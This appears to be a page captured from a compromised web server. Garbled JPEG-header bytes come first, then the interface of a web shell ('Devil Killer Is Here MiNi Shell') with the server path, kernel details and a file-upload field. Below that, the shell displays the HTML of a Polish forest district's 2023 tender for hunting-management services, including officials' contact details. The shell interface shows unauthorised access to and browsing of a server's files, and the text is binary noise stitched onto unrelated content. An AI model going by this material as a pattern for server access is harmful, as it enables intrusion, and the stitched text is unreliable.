JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231219/0056095901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonywanie usług z zakresu gospodarki łowieckiej na terenie Nadleśnictwa Łopuchówko w 2024 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Łopuchówko</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 630011510</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Łopuchówko 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Murowana Goślina</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-095</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 61 8 122 161</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 61 8 122 161 w.128</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">lopuchowko@poznan.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://lopuchowko.poznan.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> leśnictwo, gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonywanie usług z zakresu gospodarki łowieckiej na terenie Nadleśnictwa Łopuchówko w 2024 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-15283ad4-9cd1-11ee-953e-c2ea26915e21</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00560959</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00488536/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Wykonywanie usług z zakresu gospodarki łowieckiej w Nadleśnictwie Łopuchówko w 2024 roku - II postępowanie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-15283ad4-9cd1-11ee-953e-c2ea26915e21 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Z-cym,a W-cami odbywa się przy użyciu Platformy e-<br/>Zamówienia(„Platforma”)która jest dostępna pod adresem: https://ezamowienia.gov.pl oraz poczty elektronicznej,z zastrzeżeniem,że<br/>złożenie oferty następuje wyłącznie przy użyciu Platformy.<br/>Komunikacja w postępowaniu(z wyłączeniem składania ofert- sposób złożenia oferty opisany jest w pkt 10.10.SWZ)odbywa się<br/>drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce„Formularze”(„Formularze do komunikacji”)oraz za pośrednictwem poczty elektronicznej.Info.na temat komunikacji za pośrednictwem Platformy dostępne są również w Instrukcji interaktywnej Komunikacja w postępowaniu dostępnej pod adresem: https://media.ezamowienia.gov.pl/pod/2021/10/Komunikacja-w-postepowaniu-5.1.pdf. Z-ący dopuszcza również<br/>komunikację z W-cami za pomocą poczty elektronicznej,email: karolina.lewandowska@poznan.lasy.gov.pl lub lopuchowko@poznan.lasy.gov.pl(nie dotyczy składania ofert). Szczegóły zawarto w rozdz.10 SWZ</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Osobą uprawnioną do porozumiewania się z Wykonawcami jest: p. Karolina Lewandowska lub osoba ją zastępująca, e-mail: lopuchowko@poznan.lasy.gov.pl lub<br/>karolina.lewandowska@poznan.lasy.gov.pl od poniedziałku do piątku w godz. 07:00 – 15:00, z wyłączeniem dni wolnych od pracy.<br/>Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto<br/>podmiotu „Wykonawca” na Platformie. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy, w tym minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy oraz informacje dotyczące specyfikacji połączenia określa „Regulamin korzystania z Platformy e-Zamówienia”, dostępny pod adresem: https://ezamowienia.gov.pl/pl/regulamin/ oraz informacje zamieszczone na stronie Platformy w zakładce „Centrum Pomocy”. Przeglądanie i pobieranie publicznej treści dokumentacji dotyczącej niniejszego postępowania nie wymaga posiadania<br/>konta na Platformie ani logowania.<br/>Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej<br/>w postaci papierowej (cyfrowe odwzorowanie) musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020 r. r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz. U. z 2020 r., poz. 2452).<br/>Dokumenty elektroniczne wymienione w SWZ, o których mowa w §2 ust. 1 rozporządzenia wskazanego w pkt 10.6. SWZ sporządza<br/>się w formatach danych określonych w rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych<br/>wymagań dla systemów teleinformatycznych (tekst jedn.: Dz. U. z 2017 r. poz. 2247 z późn. zm.), z uwzględnieniem rodzaju<br/>przekazywanych danych i przekazuje się jako załączniki.<br/>Wymagane w SWZ informacje, oświadczenia lub dokumenty, inne niż wymienione w §2 ust. 1 rozporządzenia wskazanego w pkt.<br/>10.6. SWZ, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a) w formatach danych określonych w przepisach rozporządzenia w sprawie Krajowych Ram Interoperacyjności, minimalnych<br/>wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów<br/>teleinformatycznych (i przekazuje się jako załącznik), lub<br/>b) jako tekst wpisany bezpośrednio do widomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań, zawiadomień i wniosków<br/>służących do zadawania pytań o wyjaśnienie treści SWZ. „Formularze do komunikacji” umożliwiają, również dołączenie załącznika<br/>do przesłanej wiadomości (przycisk „dodaj załącznik”).<br/>Szczegółowe informacje w tym zakresie zostały zawarte w rozdziale nr 10 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych) (Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych jest: Skarb Państwa PGL LP Nadleśnictwo Łopuchówko, Łopuchówko 1, 62-095 Murowana Goślina. Administrator wyznaczył Inspektora Ochrony Danych Osobowych p. Katarzyna Ślusarek, z którą w sprawach dotyczących przetwarzania danych osobowych można skontaktować się za pośrednictwem poczty elektronicznej pod adresem iod_lopuchowko@rodo.pl lub telefonicznie pod numerem:<br/>605 236 635.<br/>2. Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia publicznego w sposób<br/>gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.<br/>3. Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony<br/>prawnej, o których mowa w dziale VI PZP, do upływu terminu do ich wniesienia.<br/>4. Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być dopuszczone wyłącznie osoby posiadające<br/>upoważnienie. Osoby dopuszczone do przetwarzania takich danych są obowiązane do zachowania ich w poufności.<br/>5. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem niniejszego<br/>postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki<br/>określone w art. 255-256 PZP – w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.<br/>6. Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona w oparciu o<br/>przepisy PZP.<br/>7. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia publicznego.<br/>8. Niezależnie od postanowień pkt 28.7. powyżej, w przypadku zawarcia umowy w sprawie zamówienia publicznego, dane osobowe<br/>będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego.<br/>9. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia mogą zostać<br/>przekazane podmiotom świadczącym usługi doradcze, w tym usługi prawne, i konsultingowe.<br/>10. Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane w sposób zautomatyzowany.<br/>Dalsze postanowienia zawarte zostały w pkt. 28.11 i 28.12 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Osobie, której dane osobowe zostały pozyskane przez Zamawiającego w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego nie przysługuje:<br/>1) prawo do usunięcia danych osobowych, o czym przesadza art. 17 ust. 3 lit. b, d lub e RODO,<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, określone w art. 21 RODO prawo sprzeciwu wobec<br/>przetwarzania danych osobowych, a to z uwagi na fakt, że podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c<br/>RODO.<br/>Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub innych podmiotów upoważnionych na<br/>podstawie przepisów prawa lub wykonujących zadania realizowane w interesie publicznym lub w ramach sprawowania władzy<br/>publicznej, w szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego. Dane osobowe są<br/>przekazywane do podmiotów przetwarzających dane w imieniu administratora danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.32.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Przedmiotem zamówienia są usługi z zakresu gospodarki łowieckiej zgodnie z określeniem w art. 4 ust. 1 ustawy z dnia 13 października 1995 r. Prawo łowieckie obejmujące prace z zakresu zagospodarowania łowiska na terenie obwodu łowieckiego nr 177 Kąty - Ośrodek Hodowli Zwierzyny (dalej „OHZ Kąty”), w tym uprawa poletek łowieckich, dokarmianie<br/>zwierzyny, konserwacja i naprawa urządzeń łowieckich, a także obsługa polowań zbiorowych w roku 2024.<br/>2) Zakres rzeczowy przedmiotu zamówienia obejmuje sumaryczne ilości prac wynikające z zał. nr 11 do SWZ stanowiący rozmiar prac według grup czynności.<br/>3) Zakres rzeczowy zestawiony w zał. nr 11 do SWZ ma charakter szacunkowy. Ilość prac zleconych do wykonania w trakcie realizacji Przedmiotu zamówienia może być mniejszy od ilości przedstawionej w SWZ, co jednak nie może być podstawą do jakichkolwiek roszczeń Wykonawcy w stosunku do Zamawiającego. Zamawiający może zlecić w trakcie<br/>realizacji zamówienia zakres prac mniejszy niż wskazany w SWZ, jednak nie mniej niż 70 % Wartości Przedmiotu Umowy określonej zgodnie z § 10 ust. 1 i 2 wzoru umowy (zał. nr 10 do SWZ).<br/>4) Szczegółowy opis technologii wykonania poszczególnych czynności wchodzących w skład przedmiotu zamówienia wraz z procedurą odbioru prac zawarty został w zał. nr 12 do SWZ.<br/>5) Opisy kodów czynności opisujących poszczególne czynności wchodzące w skład przedmiotu zamówienia zostały opisane w zał. nr 12 do SWZ.<br/>6) Opis zasad procedury dokonywania odbiorów czynności objętych zamówieniem został zawarty w zał. nr 12 do SWZ.<br/>7) Miejscem realizacji przedmiotu zamówienia będzie obszar administracyjny Nadleśnictwa Łopuchówko tj. teren „OHZ Kąty”.<br/>8) Realizacja prac wchodzących w skład przedmiotu zamówienia będzie się odbywała na obszarze OHZ Kąty. Wskazana w zał. nr 11 przedmiotu zamówienia, lokalizacja (adres leśny/numer inwentarzowy) poszczególnych prac wchodzących w zakres Przedmiotu Zamówienia ma charakter wstępny. Lokalizacja (adres leśny/numer inwentarzowy) poszczególnych prac<br/>wchodzących w zakres Przedmiotu Zamówienia zostanie określona w Zleceniu, o którym mowa w pkt 3.3. ppkt. 1) SWZ, z<br/>zastrzeżeniem, iż zawsze będzie to Obszar Realizacji Zamówienia.<br/>9) Postanowienia pkt. 7 - 8 nie uchybiają uprawnieniom Zamawiającego wynikającym ze wzoru umowy w sprawie zamówienia publicznego (zał. nr 10 do SWZ).<br/>10) Z uwagi na faktyczną sytuację przyrodniczo-pogodową, która może zaistnieć w trakcie realizacji przedmiotu zamówienia, a także nieprzewidzianą w tej chwili sytuację gospodarczo-ekonomiczną, powierzenia Zamawiającemu nowych zadań gospodarczych lub publicznych, wystąpienie siły wyższej, Zamawiający zastrzega sobie prawo do dokonania korekt zmniejszających, korekt zwiększających, ustaleń nowych lokalizacji, jak również wstrzymania dokonania czynności wskazanych w poszczególnych wierszach tabel opisujących przedmiot zamówienia. Korekty zwiększające nie oznaczają wprowadzenia nowych prac, nie objętych zakresem zamówienia podstawowego, a korekty zmniejszające nie oznaczają całkowitej rezygnacji z części prac. Należy je rozumieć jako zwiększenie ilości prac w jednej lokalizacji (adresie leśnym/numerze inwentarzowym) na Obszarze Realizacji Zamówienia (w tym również w lokalizacjach na Obszarze Realizacji Zamówienia niewskazanych wstępnie w SWZ), przy jednoczesnym zmniejszeniu ilości prac w innej lokalizacji (adresie leśnym/numerze inwentarzowym) na Obszarze Realizacji Zamówienia, w ramach sumarycznych ilości poszczególnych prac wchodzących w zakres Przedmiotu Umowy określonych w SWZ, przypadających do wykonania na całym Obszarze Realizacji Zamówienia. Konieczność zwiększenia rozmiaru niektórych elementów realizowanego zamówienia w toku wykonywania przedmiotu zamówienia może wystąpić również po to, aby zrealizować pełny zakres prac opisany w przedmiocie zamówienia. Ustalenie nowej lokalizacji odbywa się w ramach przedmiotu zamówienia, przy czym<br/>zawsze wyłącznie na Obszarze Realizacji Zamówienia. Wykonawca zobowiązany będzie do wykonywania przedmiotu zamówienia zgodnie z zasadami etyki i zwyczajów łowieckich oraz z obowiązującymi przepisami prawa. Unormowania, których zobowiązany będzie w szczególności przestrzegać Wykonawca przy realizacji przedmiotu zamówienia wymienione zostały w pkt. 3.2. SWZ. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych zadań dotyczących przedmiotu zamówienia. Wykonawca może powierzyć realizację elementów (części) przedmiotu zamówienia podwykonawcom. W przypadku zamiaru wykonywania przedmiotu zamówienia z udziałem podwykonawców, wykonawca zobowiązany jest do wskazania w swojej ofercie części zamówienia (zakresów rzeczowych), których wykonanie zamierza powierzyć<br/>podwykonawcom oraz podania nazw ewentualnych podwykonawców, jeżeli są już znani. Wskazanie takie należy umieścić w Ofercie. W przypadku braku wskazania w ofercie podwykonawstwa, wykonawca będzie mógł wprowadzić podwykonawcę wyłącznie na warunkach określonych w umowie.<br/>Zamawiający wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących<br/>czynności wchodzące w skład przedmiotu zamówienia tj. osób wykonujących czynności w zakresie obsługi maszyn rolniczych, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (tekst jedn.: Dz. U. z 2023 r. poz. 1465 z późn. zm.). Sposób dokumentowania zatrudnienia osób na podstawie umowy o pracę, a także uprawnienia Zamawiającego w zakresie kontroli spełniania przez Wykonawcę wymagań, o których mowa w art. 95 ust. 1, oraz sankcji z tytułu niespełnienia tych wymagań określa wzór<br/>umowy stanowiący załącznik nr 10 do SWZ. Pozostałe zasady ogólne realizacji przedmiotu zamówienia wymienione zostały w pkt. 3.3. SWZ.<br/>Zamawiający nie przewiduje obowiązku odbycia przez Wykonawcę wizji lokalnej. Niemniej jednak zalecane jest dokonanie przez Wykonawcę wizji lokalnej miejsca przeznaczonego do realizacji usług i ich otoczenia, a także zdobycie wszelkich dodatkowych informacji, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia.<br/>Koszt dokonania wizji lokalnej ponosi wykonawca. Wizję lokalną można przeprowadzić po uprzednim kontakcie z pracownikiem, o którym mowa w pkt. 10.1. SWZ i po ustaleniu dogodnego dla obu stron terminu spotkania, przy uwzględnieniu godzin pracy siedziby Zamawiającego – biuro Nadleśnictwa Łopuchówko czynne jest od poniedziałku do<br/>piątku w godzinach od 7.00 do 15.00, z wyłączeniem dni wolnych od pracy.<br/>Zamawiający nie dokonuje podziału zamówienia na części i tym samym nie dopuszcza składania ofert częściowych - uzasadnienie braku podziału zamówienia na części wskazane zostało w pkt. 3.4. SWZ, Materiały na potrzeby realizacji zamówienia (nasiona, nawozy, kukurydza, karma soczysta i treściwa, drewno, gwoździe, papa, środki do bioasekuracji wymaganej przepisami weterynaryjnymi) zapewnia Zamawiający. Materiały eksploatacyjne do maszyn i urządzeń wykorzystywanych do realizacji usługi, zapewnia Wykonawca. Jeżeli czynność opisana w standardzie dla usług łowieckich (załącznik nr 12 do SWZ) nie została przewidziana w opisie<br/>przedmiotu zamówienia (Załącznik nr 11 do SWZ), to w tym zakresie postanowień Załącznika nr 12 do SWZ nie stosuje się. Szczegółowy opis zamówienia zawarty został w rozdziale nr 3 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77600000-6 - Usługi myśliwskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy obejmujący czynności takie same (analogiczne), jak opisane w opisie przedmiotu zamówienia („Opcja”). Przedmiotem Opcji będą prace analogiczne, jak opisane w SWZ (i wycenione przez Wykonawcę w kosztorysie ofertowym stanowiącym część Oferty). W ramach Opcji,<br/>wedle wyboru Zamawiającego, mogą zostać zlecone wszystkie, niektóre lub jedna z prac wskazanych w SWZ (i wycenionych przez Wykonawcę w kosztorysie ofertowym stanowiącym część Oferty). Zamawiający nie jest zobowiązany do zlecenia prac objętych przedmiotem Opcji, a Wykonawcy nie służy roszczenie o ich zlecenie. Prace będące przedmiotem<br/>Opcji mogą zostać zlecone na wartość do 20 % wartości przedmiotu zamówienia określonej zgodnie z §10 ust. 1 wzoru<br/>umowy stanowiącego załącznik nr 10 do SWZ. Podstawą określenia wartości prac zleconych w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe poszczególnych prac zawarte w kosztorysie ofertowym stanowiącym część Oferty.<br/>Zamawiający przewiduje możliwość skorzystania z Opcji w przypadku: wystąpienia potrzeby zwiększenia zakresu rzeczowego usług stanowiących przedmiot zamówienia na skutek warunków przyrodniczych, atmosferycznych bądź możliwości zwiększenia zakresu rzeczowego usług w 